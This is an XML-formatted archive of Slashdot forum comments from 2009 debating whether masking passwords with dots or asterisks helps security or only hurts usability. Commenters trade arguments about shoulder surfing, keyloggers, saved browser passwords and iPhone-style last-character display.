	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471631</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>grumbel</author>
	<datestamp>1245922200000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p><div class="quote"><p>than they can see your fingers type they characters of your password on the keyboard</p></div><p>Have you ever tried that? Unless you practice it a good bit you are quite unlikely to succeed, you also have to have a good stare at the keyboard which could be easily noticed by the user. Having the password clearly readable on the screen is a whole different matter. People are trained to recognize words quite literally in the blink of an eye. So any non-trivial password is very easy to spot when its written to the screen, even from a distance when you are not actually trying to read it you could spot it just by accident, as you can't stop your brain from recognizing words.</p><p>The argument with the keyboard logger really isn't a good one. Sure, obscuring the password won't stop all attacks, but it will stop a lot of attacks and raise the bar for attack much higher, as you have to actually plan the attack and not just look at the screen at the right moment by accident.</p><p>That said, an option on the entry-box to de-obscure the password would be welcome, since some are just a chore to type without visual confirmation (long WLAN keys and such).</p></div>
	</htmltext>
<tokenext>than they can see your fingers type they characters of your password on the keyboardHave you ever tried that ?
Unless you practice it a good bit you are quite unlikely to succeed , you also have to have a good stare at the keyboard which could be easily noticed by the user .
Having the password clearly readable on the screen is a whole different matter .
People are trained to recognize words quite literally in the blink of an eye .
So any non-trivial password is very easy to spot when its written to the screen , even from a distance when you are not actually trying to read it you could spot it just by accident , as you ca n't stop your brain from recognizing words.The argument with the keyboard logger really is n't a good one .
Sure , obscuring the password wo n't stop all attacks , but it will stop a lot of attacks and raise the bar for attack much higher , as you have to actually plan the attack and not just look at the screen at the right moment by accident.That said , an option on the entry-box to de-obscure the password would be welcome , since some are just a chore to type without visual confirmation ( long WLAN keys and such ) .</tokentext>
<sentencetext>than they can see your fingers type they characters of your password on the keyboardHave you ever tried that?
Unless you practice it a good bit you are quite unlikely to succeed, you also have to have a good stare at the keyboard which could be easily noticed by the user.
Having the password clearly readable on the screen is a whole different matter.
People are trained to recognize words quite literally in the blink of an eye.
So any non-trivial password is very easy to spot when its written to the screen, even from a distance when you are not actually trying to read it you could spot it just by accident, as you can't stop your brain from recognizing words.The argument with the keyboard logger really isn't a good one.
Sure, obscuring the password won't stop all attacks, but it will stop a lot of attacks and raise the bar for attack much higher, as you have to actually plan the attack and not just look at the screen at the right moment by accident.That said, an option on the entry-box to de-obscure the password would be welcome, since some are just a chore to type without visual confirmation (long WLAN keys and such).
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472001</id>
	<title>Re:idiot</title>
	<author>inject\_hotmail.com</author>
	<datestamp>1245923280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I bet all his passwords are blank.</htmltext>
<tokenext>I bet all his passwords are blank .</tokentext>
<sentencetext>I bet all his passwords are blank.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470923</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471665</id>
	<title>Re:Two words</title>
	<author>vertinox</author>
	<datestamp>1245922260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</i></p><p>What do you mean office? Its either the cube or my parents basement.</p><p>And mom always looks over my shoulder when she does laundry...</p></htmltext>
<tokenext>More importantly , there 's usually nobody looking over your shoulder when you log in to a website .
It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue.What do you mean office ?
Its either the cube or my parents basement.And mom always looks over my shoulder when she does laundry.. .</tokentext>
<sentencetext>More importantly, there's usually nobody looking over your shoulder when you log in to a website.
It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.What do you mean office?
Its either the cube or my parents basement.And mom always looks over my shoulder when she does laundry...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472035</id>
	<title>There's a worse and more subtle evil</title>
	<author>Thaelon</author>
	<datestamp>1245923340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>I've never been impressed by the argument that 'I can't think why we need this (standard) security measure, so let's drop it.' It usually indicates a lack of imagination of the speaker. But in this case, does usability outweigh security?"</p></div></blockquote><p>In counterpoint, I've never been impressed by the argument that "It's a standard security measure that everyone does."  It usually indicates a lack of critical thinking of the speaker.</p><p>For a specific example, passwords that expire after a certain time period.  Especially those that expire after, say, the windows standard period of 42 days, and start reminding you that it's going to expire <em>fourteen</em> days prior to the actual expiration. This means you only get 28 days of nag-free logins.  After which, you have to dismiss an additional modal dialog before you can log in and begin working.  Not to mention that for the first few days to a week after you've been forced to increment the number on the end of your password as you do every 42 days, you invariably enter it wrong the first few times, often locking yourself out, and necessitate additional work from the IT guys and lost time by the users.</p><p>Another example is those absurd legal disclaimers at the end of emails that apparently <a href="http://slate.msn.com/id/2101561/" title="msn.com">carry little legal weight</a> [msn.com], if any.</p></div>
	</htmltext>
<tokenext>I 've never been impressed by the argument that 'I ca n't think why we need this ( standard ) security measure , so let 's drop it .
' It usually indicates a lack of imagination of the speaker .
But in this case , does usability outweigh security ?
" In counterpoint , I 've never been impressed by the argument that " It 's a standard security measure that everyone does .
" It usually indicates a lack of critical thinking of the speaker.For a specific example , passwords that expire after a certain time period .
Especially those that expire after , say , the windows standard period of 42 days , and start reminding you that it 's going to expire fourteen days prior to the actual expiration .
This means you only get 28 days of nag-free logins .
After which , you have to dismiss an additional modal dialog before you can log in and begin working .
Not to mention that for the first few days to a week after you 've been forced to increment the number on the end of your password as you do every 42 days , you invariably enter it wrong the first few times , often locking yourself out , and necessitate additional work from the IT guys and lost time by the users.Another example is those absurd legal disclaimers at the end of emails that apparently carry little legal weight [ msn.com ] , if any .</tokentext>
<sentencetext>I've never been impressed by the argument that 'I can't think why we need this (standard) security measure, so let's drop it.
' It usually indicates a lack of imagination of the speaker.
But in this case, does usability outweigh security?
"In counterpoint, I've never been impressed by the argument that "It's a standard security measure that everyone does.
"  It usually indicates a lack of critical thinking of the speaker.For a specific example, passwords that expire after a certain time period.
Especially those that expire after, say, the windows standard period of 42 days, and start reminding you that it's going to expire fourteen days prior to the actual expiration.
This means you only get 28 days of nag-free logins.
After which, you have to dismiss an additional modal dialog before you can log in and begin working.
Not to mention that for the first few days to a week after you've been forced to increment the number on the end of your password as you do every 42 days, you invariably enter it wrong the first few times, often locking yourself out, and necessitate additional work from the IT guys and lost time by the users.Another example is those absurd legal disclaimers at the end of emails that apparently carry little legal weight [msn.com], if any.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817</id>
	<title>Making my point with humor</title>
	<author>Anonymous</author>
	<datestamp>1245962820000</datestamp>
	<modclass>Funny</modclass>
	<modscore>4</modscore>
	<htmltext><p>Usability? What the hell is he talking about? The user doesn't see the dots, only other people see those. The user should see their own password when they type it. Maybe he should check his glasses because those characters must be so blurry to him that they look like dots.</p></htmltext>
<tokenext>Usability ?
What the hell is he talking about ?
The user does n't see the dots , only other people see those .
The user should see their own password when they type it .
Maybe he should check his glasses because those characters must be so blurry to him that they look like dots .</tokentext>
<sentencetext>Usability?
What the hell is he talking about?
The user doesn't see the dots, only other people see those.
The user should see their own password when they type it.
Maybe he should check his glasses because those characters must be so blurry to him that they look like dots.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471509</id>
	<title>Re:Indeed lack of imagination</title>
	<author>ucblockhead</author>
	<datestamp>1245921780000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside. Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.</i></p><p>I only log into my bank from my den.  There are two windows.  Neither has line of site from off my property.</p><p><i>2) How many times have you typed in your password while somebody was looking at your screen eg. to show somebody something on a protected website. This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.</i></p><p>The only people who are ever present when I log into my bank are my wife or my son.  One has the bank password already.  The other is six.</p><p><i>3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg. teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.</i></p><p>I would never log into my bank account in such a situation.</p><p><i>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</i></p><p>You can capture any form entry in Windows using userspace code if you know the right tricks.  It isn't even particularly difficult.  If you have physical access to the machine, it is hacked, and not echoing passwords does nothing.</p><p>For certain situations, not echoing passwords creates no added security at all.</p></htmltext>
<tokenext>1 ) If I look outside my office window , I can see about 48 office windows ( without standing up ) and all of them have the lights on and it 's dusk outside .
Give me a dSLR and a decent set of long distance lenses and I 'll prove you wrong.I only log into my bank from my den .
There are two windows .
Neither has line of site from off my property.2 ) How many times have you typed in your password while somebody was looking at your screen eg .
to show somebody something on a protected website .
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.The only people who are ever present when I log into my bank are my wife or my son .
One has the bank password already .
The other is six.3 ) How many times have you given a presentation where your screen view ( but not your keyboard input ) goes worldwide ( eg .
teleconference ) or over a set of wires that you know have n't been tampered with ( conference room ) - again , logging in to your webmail or so to find a copy of your presentation.I would never log into my bank account in such a situation.4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) LinuxYou can capture any form entry in Windows using userspace code if you know the right tricks .
It is n't even particularly difficult .
If you have physical access to the machine , it is hacked , and not echoing passwords does nothing.For certain situations , not echoing passwords creates no added security at all .</tokentext>
<sentencetext>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside.
Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.I only log into my bank from my den.
There are two windows.
Neither has line of site from off my property.2) How many times have you typed in your password while somebody was looking at your screen eg.
to show somebody something on a protected website.
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.The only people who are ever present when I log into my bank are my wife or my son.
One has the bank password already.
The other is six.3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg.
teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.I would never log into my bank account in such a situation.4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) LinuxYou can capture any form entry in Windows using userspace code if you know the right tricks.
It isn't even particularly difficult.
If you have physical access to the machine, it is hacked, and not echoing passwords does nothing.For certain situations, not echoing passwords creates no added security at all.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471753</id>
	<title>Re:Easy solution</title>
	<author>Clovis42</author>
	<datestamp>1245922560000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>I can't read what word you wrote. It is filtered or something.</htmltext>
<tokenext>I ca n't read what word you wrote .
It is filtered or something .</tokentext>
<sentencetext>I can't read what word you wrote.
It is filtered or something.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255</id>
	<title>Re:Making my point with humor</title>
	<author>Profane MuthaFucka</author>
	<datestamp>1245921000000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext><tt>That comment is 99.99999\% funny. It's 0.00001\% true in the case of an all asterix passwd.</tt></htmltext>
<tokenext>That comment is 99.99999 \ % funny .
It 's 0.00001 \ % true in the case of an all asterix passwd .</tokentext>
<sentencetext>That comment is 99.99999\% funny.
It's 0.00001\% true in the case of an all asterix passwd.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473155</id>
	<title>One of my past employers did this.</title>
	<author>californication</author>
	<datestamp>1245927360000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Concerned that having to type in a password twice or mistyping a password might deter users from signing up for their website, I was asked by my employer to change the sign-up page to show a single password box with the password in plain text while the user was typing the password, switch it over to masked text when the password box lost focus, and clear the password box if the user set focus on it again.  I thought it was unconventional and a bit crazy, but it wasn't like we were securing highly classified materials.</p></htmltext>
<tokenext>Concerned that having to type in a password twice or mistyping a password might deter users from signing up for their website , I was asked by my employer to change the sign-up page to show a single password box with the password in plain text while the user was typing the password , switch it over to masked text when the password box lost focus , and clear the password box if the user set focus on it again .
I thought it was unconventional and a bit crazy , but it was n't like we were securing highly classified materials .</tokentext>
<sentencetext>Concerned that having to type in a password twice or mistyping a password might deter users from signing up for their website, I was asked by my employer to change the sign-up page to show a single password box with the password in plain text while the user was typing the password, switch it over to masked text when the password box lost focus, and clear the password box if the user set focus on it again.
I thought it was unconventional and a bit crazy, but it wasn't like we were securing highly classified materials.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471477</id>
	<title>Re:Two words</title>
	<author>saforrest</author>
	<datestamp>1245921720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>Retarded doesn't begin to cover this. Offering a default to turn OFF password masking for bank accounts? I'm sure the banks will just LOVE this one. We have enough problems with identity theft already.</i></p><p>Um, in the quote you presented he's arguing that for some applications such as bank passwords, you should have password-masking ON by default.</p><p>In other cases, where the password is less critical, you could have the checkbox unchecked by default, i.e. password-masking OFF.</p></div>
	</htmltext>
<tokenext>Retarded does n't begin to cover this .
Offering a default to turn OFF password masking for bank accounts ?
I 'm sure the banks will just LOVE this one .
We have enough problems with identity theft already.Um , in the quote you presented he 's arguing that for some applications such as bank passwords , you should have password-masking ON by default.In other cases , where the password is less critical , you could have the checkbox unchecked by default , i.e .
password-masking OFF .</tokentext>
<sentencetext>Retarded doesn't begin to cover this.
Offering a default to turn OFF password masking for bank accounts?
I'm sure the banks will just LOVE this one.
We have enough problems with identity theft already.Um, in the quote you presented he's arguing that for some applications such as bank passwords, you should have password-masking ON by default.In other cases, where the password is less critical, you could have the checkbox unchecked by default, i.e.
password-masking OFF.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471171</id>
	<title>Shoulder Surffing and Screen Snapshot Capture</title>
	<author>Nom du Keyboard</author>
	<datestamp>1245920700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>He seems to believe that shoulder surfing and screen snapshot capture simply doesn't exist.  I'm left to ask if the complainer is trying to solve <i>his</i> problem at the expense of everyone else.</htmltext>
<tokenext>He seems to believe that shoulder surfing and screen snapshot capture simply does n't exist .
I 'm left to ask if the complainer is trying to solve his problem at the expense of everyone else .</tokentext>
<sentencetext>He seems to believe that shoulder surfing and screen snapshot capture simply doesn't exist.
I'm left to ask if the complainer is trying to solve his problem at the expense of everyone else.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471167</id>
	<title>Another two words</title>
	<author>El Gigante de Justic</author>
	<datestamp>1245920700000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>Saved Passwords.</p><p>I typically have my web browser save my passwords for things I consider lower risk, but if masking is removed and the browser automatically loads the password into the form, then it's available to anyone.  Considering that many users use the same or similar passwords for almost every application, and having it unmasked on one site could give up your info on any number of other sites.</p></htmltext>
<tokenext>Saved Passwords.I typically have my web browser save my passwords for things I consider lower risk , but if masking is removed and the browser automatically loads the password into the form , then it 's available to anyone .
Considering that many users use the same or similar passwords for almost every application , and having it unmasked on one site could give up your info on any number of other sites .</tokentext>
<sentencetext>Saved Passwords.I typically have my web browser save my passwords for things I consider lower risk, but if masking is removed and the browser automatically loads the password into the form, then it's available to anyone.
Considering that many users use the same or similar passwords for almost every application, and having it unmasked on one site could give up your info on any number of other sites.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471037</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245963540000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>&gt;&gt; Usernames aren't as critical.</p><p>Actually not true. If you don't know either a username or password its essentially impossible number of combinations to try to log in, however given one (it doesnt matter which), it becomes viable to use various approaches to get the other.</p></htmltext>
<tokenext>&gt; &gt; Usernames are n't as critical.Actually not true .
If you do n't know either a username or password its essentially impossible number of combinations to try to log in , however given one ( it doesnt matter which ) , it becomes viable to use various approaches to get the other .</tokentext>
<sentencetext>&gt;&gt; Usernames aren't as critical.Actually not true.
If you don't know either a username or password its essentially impossible number of combinations to try to log in, however given one (it doesnt matter which), it becomes viable to use various approaches to get the other.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472533</id>
	<title>Re:Why not a compromise?</title>
	<author>jeff4747</author>
	<datestamp>1245925020000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER. That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.</p></div></blockquote><p>Well, if you had actually read TFA, you'd have noticed that he's advocating making the masking optional.  Thus you could set it to mask in a public setting, but for the 99.999\% of the time when you can't be shoulder surfed, you can leave masking disabled.</p><blockquote><div><p>As a compromise measure I propose stealing something from Apple's playbook: The iPhone password entry interface. The last character typed is visible for 2-3 seconds, everything else is masked</p></div></blockquote><p>This is a truly stupid compromise.</p><p>Do you think that shoulder surfers are incapable of remembering 8-ish characters if they're only shown one character at a time?  Or that they don't have access to pen and paper to handle the situation if they can't remember 8 characters?</p><p>Your compromise is the worst of both worlds.  Almost all of the problems of masking, with none of the security.</p></div>
	</htmltext>
<tokenext>What TFA is suggesting is probably one of the dumbest ideas I 've heard since... EVER. That said , the dots are a usability issue -- I 've got plenty of otherwise very smart users who screw up passwords constantly.Well , if you had actually read TFA , you 'd have noticed that he 's advocating making the masking optional .
Thus you could set it to mask in a public setting , but for the 99.999 \ % of the time when you ca n't be shoulder surfed , you can leave masking disabled.As a compromise measure I propose stealing something from Apple 's playbook : The iPhone password entry interface .
The last character typed is visible for 2-3 seconds , everything else is maskedThis is a truly stupid compromise.Do you think that shoulder surfers are incapable of remembering 8-ish characters if they 're only shown one character at a time ?
Or that they do n't have access to pen and paper to handle the situation if they ca n't remember 8 characters ? Your compromise is the worst of both worlds .
Almost all of the problems of masking , with none of the security .</tokentext>
<sentencetext>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER. That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.Well, if you had actually read TFA, you'd have noticed that he's advocating making the masking optional.
Thus you could set it to mask in a public setting, but for the 99.999\% of the time when you can't be shoulder surfed, you can leave masking disabled.As a compromise measure I propose stealing something from Apple's playbook: The iPhone password entry interface.
The last character typed is visible for 2-3 seconds, everything else is maskedThis is a truly stupid compromise.Do you think that shoulder surfers are incapable of remembering 8-ish characters if they're only shown one character at a time?
Or that they don't have access to pen and paper to handle the situation if they can't remember 8 characters?Your compromise is the worst of both worlds.
Almost all of the problems of masking, with none of the security.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475431</id>
	<title>Hmmm</title>
	<author>Anonymous</author>
	<datestamp>1245937200000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Maybe he should just learn how to type.  Showing unmasked passwords is stupid.  The Unix way is best (duh, it's Unix<nobr> <wbr></nobr>:)).</p></htmltext>
<tokenext>Maybe he should just learn how to type .
Showing unmasked passwords is stupid .
The Unix way is best ( duh , it 's Unix : ) ) .</tokentext>
<sentencetext>Maybe he should just learn how to type.
Showing unmasked passwords is stupid.
The Unix way is best (duh, it's Unix :)).</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473223</id>
	<title>Usability vs security</title>
	<author>gilesjuk</author>
	<datestamp>1245927600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I thought the whole point of security is to suffer a bit of inconvenience in the name of being secure.</p><p>It is a really pain in the behind to have to unlock your car and put the key in the ignition. It's really annoying when you lose your keys, so remove the key and locks? nope, didn't think so.</p><p>Password masking stops people stealing your password when you are unaware of being watched. There are ways around the inconvenience of masking, type your password into notepad and then paste it into the login window.</p></htmltext>
<tokenext>I thought the whole point of security is to suffer a bit of inconvenience in the name of being secure.It is a really pain in the behind to have to unlock your car and put the key in the ignition .
It 's really annoying when you lose your keys , so remove the key and locks ?
nope , did n't think so.Password masking stops people stealing your password when you are unaware of being watched .
There are ways around the inconvenience of masking , type your password into notepad and then paste it into the login window .</tokentext>
<sentencetext>I thought the whole point of security is to suffer a bit of inconvenience in the name of being secure.It is a really pain in the behind to have to unlock your car and put the key in the ignition.
It's really annoying when you lose your keys, so remove the key and locks?
nope, didn't think so.Password masking stops people stealing your password when you are unaware of being watched.
There are ways around the inconvenience of masking, type your password into notepad and then paste it into the login window.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471525</id>
	<title>For the "iPhone does it better" group</title>
	<author>Anonymous</author>
	<datestamp>1245921780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The idea has been floating around before iPhone showed up. For example, PalmOS uses the same approach.</p></htmltext>
<tokenext>The idea has been floating around before iPhone showed up .
For example , PalmOS uses the same approach .</tokentext>
<sentencetext>The idea has been floating around before iPhone showed up.
For example, PalmOS uses the same approach.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471377</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245921360000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>By not masking passwords, you just render all this stuff useless. Now all you have to do is look at the screen! Yeah!</p></htmltext>
<tokenext>By not masking passwords , you just render all this stuff useless .
Now all you have to do is look at the screen !
Yeah !</tokentext>
<sentencetext>By not masking passwords, you just render all this stuff useless.
Now all you have to do is look at the screen!
Yeah!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471599</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245922080000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>remote logins</p></htmltext>
<tokenext>remote logins</tokentext>
<sentencetext>remote logins</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472691</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Beerdood</author>
	<datestamp>1245925560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.  If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).  If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.</p><p>***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.</p></div><p>
Most desktop users in an office / cubicle / shouldersurf environment have no idea what a keylogger is, let alone perform any other techniques to access your password.  Reading keyboard strokes isn't that easy either, it's pretty hard to determine the letters being typed
<br> <br>
All those other alternatives here also require a very determined, pre-meditated effort to access your password.  So in that case, the chances are the asterisks in the textbox won't make a difference.  There may not be anyone in your workplace / campus that's after your password that bad.  But if they happen to glance at your screen while you're logging into your webmail / social networking site and see the password in the textbox, or even enough of it to probably make out an un-secure password - that might be tempting enough to snoop around in your account, even though they had no previous intentions.</p></div>
	</htmltext>
<tokenext>If someone can shouldersurf , 99 \ % of the time they have physical access and all security is null .
If they can see your * * * ed password on the screen , than they can see your fingers type they characters of your password on the keyboard ( again with 1 \ % exceptions like keyboard covers and remote displays ) .
If a malicious person can see your screen , than they are probably close enough that that can tap your cables , install hardware keyloggers , sniff your EMF , cold boot your RAM and grep it , do audio analysis of your typing and decipher your keystrokes , and etc .
* * * ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment , has the keyboard kept out of site , and is n't allowed to touch anything .
Most desktop users in an office / cubicle / shouldersurf environment have no idea what a keylogger is , let alone perform any other techniques to access your password .
Reading keyboard strokes is n't that easy either , it 's pretty hard to determine the letters being typed All those other alternatives here also require a very determined , pre-meditated effort to access your password .
So in that case , the chances are the asterisks in the textbox wo n't make a difference .
There may not be anyone in your workplace / campus that 's after your password that bad .
But if they happen to glance at your screen while you 're logging into your webmail / social networking site and see the password in the textbox , or even enough of it to probably make out an un-secure password - that might be tempting enough to snoop around in your account , even though they had no previous intentions .</tokentext>
<sentencetext>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.
If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).
If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.
***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.
Most desktop users in an office / cubicle / shouldersurf environment have no idea what a keylogger is, let alone perform any other techniques to access your password.
Reading keyboard strokes isn't that easy either, it's pretty hard to determine the letters being typed
 
All those other alternatives here also require a very determined, pre-meditated effort to access your password.
So in that case, the chances are the asterisks in the textbox won't make a difference.
There may not be anyone in your workplace / campus that's after your password that bad.
But if they happen to glance at your screen while you're logging into your webmail / social networking site and see the password in the textbox, or even enough of it to probably make out an un-secure password - that might be tempting enough to snoop around in your account, even though they had no previous intentions.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473051</id>
	<title>Re:Biometric scanners</title>
	<author>Gnom3</author>
	<datestamp>1245926940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Man loses thumb to thief after refusing to unlock his Biometric enabled laptop...
<br> <br>
No thanks. Take my password, or if it's that important, kill me and you still won't have access...</htmltext>
<tokenext>Man loses thumb to thief after refusing to unlock his Biometric enabled laptop.. . No thanks .
Take my password , or if it 's that important , kill me and you still wo n't have access.. .</tokentext>
<sentencetext>Man loses thumb to thief after refusing to unlock his Biometric enabled laptop...
 
No thanks.
Take my password, or if it's that important, kill me and you still won't have access...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472395</id>
	<title>Re:Two words</title>
	<author>Grishnakh</author>
	<datestamp>1245924480000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
